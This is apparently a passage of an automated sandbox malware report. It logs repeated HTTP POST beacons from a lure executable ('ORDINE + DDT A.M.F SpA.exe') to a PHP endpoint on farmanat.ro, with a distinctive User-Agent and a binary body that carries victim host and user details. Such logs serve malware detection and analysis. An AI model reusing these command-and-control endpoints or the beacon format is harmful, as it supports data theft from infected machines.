Nov 25, 2021 10:53:02.620155096 CET	7115	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:53:01 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
578	192.168.11.20	50422	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:53:03.009357929 CET	7116	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:53:03.042840004 CET	7116	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:53:03.101900101 CET	7116	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:53:02 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
579	192.168.11.20	50423	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:53:03.550199986 CET	7117	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:53:03.583940029 CET	7117	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:53:03.633420944 CET	7117	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:53:02 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
58	192.168.11.20	49894	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:48:38.572494984 CET	6390	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:48:38.605989933 CET	6390	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:48:38.655184984 CET	6390	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:48:37 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
580	192.168.11.20	50424	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:53:04.065979958 CET	7118	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:53:04.100127935 CET	7118	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:53:04.149718046 CET	7119	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:53:03 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
581	192.168.11.20	50425	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:53:04.540647030 CET	7120	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:53:04.574812889 CET	7120	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:53:04.624695063 CET	7120	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:53:03 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
582	192.168.11.20	50426	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:53:04.999028921 CET	7121	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:53:05.032639980 CET	7121	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:53:05.088746071 CET	7121	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:53:04 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
583	192.168.11.20	50427	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:53:05.526148081 CET	7122	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:53:05.560452938 CET	7122	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:53:05.611506939 CET	7123	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:53:04 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
584	192.168.11.20	50428	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:53:06.040956974 CET	7124	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:53:06.075196028 CET	7124	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:53:06.125076056 CET	7124	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:53:05 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
585	192.168.11.20	50429	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:53:06.546833992 CET	7125	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:53:06.581208944 CET	7125	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:53:06.631406069 CET	7126	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:53:05 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
586	192.168.11.20	50430	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:53:07.053704023 CET	7126	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:53:07.087788105 CET	7127	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:53:07.137511969 CET	7127	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:53:06 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
587	192.168.11.20	50431	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:53:07.512223005 CET	7128	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:53:07.545730114 CET	7128	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:53:07.597048998 CET	7128	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:53:06 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
588	192.168.11.20	50432	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:53:08.018557072 CET	7129	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:53:08.052810907 CET	7129	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:53:08.102920055 CET	7130	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:53:07 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
589	192.168.11.20	50433	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:53:08.530987978 CET	7130	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:53:08.564483881 CET	7130	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:53:08.614139080 CET	7131	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:53:07 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
59	192.168.11.20	49895	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:48:39.175559044 CET	6391	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:48:39.209995985 CET	6391	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:48:39.260907888 CET	6392	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:48:38 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
590	192.168.11.20	50434	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:53:09.043354988 CET	7132	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:53:09.076941967 CET	7132	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:53:09.126302958 CET	7132	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:53:08 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
591	192.168.11.20	50435	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:53:09.554096937 CET	7133	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:53:09.588213921 CET	7133	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:53:09.637712002 CET	7133	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:53:08 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
592	192.168.11.20	50436	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:53:10.015599966 CET	7134	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:53:10.049029112 CET	7134	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:53:10.101243019 CET	7135	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:53:09 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
593	192.168.11.20	50437	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:53:10.527559042 CET	7136	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:53:10.561721087 CET	7136	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:53:10.612761974 CET	7136	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:53:09 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
594	192.168.11.20	50438	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:53:11.042169094 CET	7137	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:53:11.076443911 CET	7137	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:53:11.126674891 CET	7137	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:53:10 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
595	192.168.11.20	50439	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:53:11.544617891 CET	7138	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:53:11.578764915 CET	7138	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:53:11.628433943 CET	7139	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:53:10 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
596	192.168.11.20	50440	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
